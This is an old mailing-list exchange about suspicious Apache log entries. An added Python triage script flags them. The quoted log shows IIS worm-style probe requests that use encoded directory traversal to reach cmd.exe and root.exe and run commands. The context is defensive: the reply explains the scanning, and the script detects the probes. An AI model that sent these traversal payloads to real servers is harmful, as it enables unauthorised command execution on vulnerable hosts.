
Re: Strange httpd/access_log entry



The answer to your first question is Yes... someone is trying to hack you, but that's very common ... 
what's really going on is they are scanning ISPs for vulnerable hosts, so they'll go through first and 
scan for port 80 open, then they'll input the list of IPs into their next scanner, which checks for common 
vulnerabilities.  As for the things I see currently, unless you're running Windows on that machine you 
have no worries :)

What do you mean exactly that you get the entire listing for your hard drive? That would mean that you 
have the root dir of your httpd set to the root dir of your hard drive; you can change that in 
httpd.conf if you like.. =)

--Jamon Terrell

4/11/2002 12:02:12 PM, Gary <medmanks@mcleodusa.net> wrote:

>
>Can anyone help me out here... 
>
>I found these entries, is someone trying to hack me?  
>What is really weird is in a browser, if I type file://64.163.212.171/
>I get the entire listing for my HD
>
>Doing a host -a 64.163.212.171 yields a reverse entry for pacbel... 
>
>Log entries are:
>
>64.163.212.171 - - [11/Apr/2002:11:01:34 -0500] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:35 -0500] "GET
>/MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:35 -0500] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:36 -0500] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:39 -0500] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:40 -0500] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 329 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:40 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 329 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:41 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 345 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:41 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:43 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:51 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
>"-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:51 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-"
>"-"
>
>
>-- 
>Best regards,
>Gary   
>
>
>
>-
>To unsubscribe, send email to majordomo@silug.org with
>"unsubscribe silug-discuss" in the body.
>
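
An added example, not part of either poster's message: a small access_log triage script that flags requests like the ones quoted above (double percent-encoding, invalid UTF-8 lead bytes, traversal to cmd.exe/root.exe) and reports, per client, whether any probe got a response other than 4xx. The function names, reason labels and the 192.0.2.10 line are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# First four lines: entries from the log quoted above, unwrapped to one line each.
# Last line: constructed benign request from a documentation-range address.
SAMPLE = [
    '64.163.212.171 - - [11/Apr/2002:11:01:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"',
    '64.163.212.171 - - [11/Apr/2002:11:01:39 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"',
    '64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"',
    '64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"',
    '192.0.2.10 - - [11/Apr/2002:11:05:00 -0500] "GET /docs/my%20file.html HTTP/1.0" 200 1024 "-" "-"',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
TARGETS = (b"cmd.exe", b"root.exe")
BAD_LEAD = re.compile(rb"[\xc0\xc1]")   # lead bytes that never occur in valid UTF-8
TRAVERSAL = re.compile(rb"\.\.[\\/]")

def classify(path):
    """Return the reasons a request path looks like one of the probes in the thread."""
    once = unquote_to_bytes(path)        # the path after one percent-decode
    twice = unquote_to_bytes(once)       # the path after a second, erroneous decode
    reasons = set()
    if twice != once:
        reasons.add("double-encoding")
    if BAD_LEAD.search(once):
        reasons.add("overlong-utf8")
    if TRAVERSAL.search(twice):
        reasons.add("traversal")
    if any(t in twice.lower() for t in TARGETS):
        reasons.add("windows-shell")
    return reasons

def scan(lines):
    """Map client IP -> probe count, reasons seen, and probes not answered with 4xx."""
    report = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        reasons = classify(path)
        if not reasons:
            continue
        entry = report.setdefault(ip, {"probes": 0, "reasons": set(), "not_rejected": []})
        entry["probes"] += 1
        entry["reasons"] |= reasons
        if not status.startswith("4"):
            entry["not_rejected"].append(path)
    return report
```

An empty `not_rejected` list for a client means every flagged request was answered with a 4xx status, as in the log above; any path that does appear there is the one to look at first.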



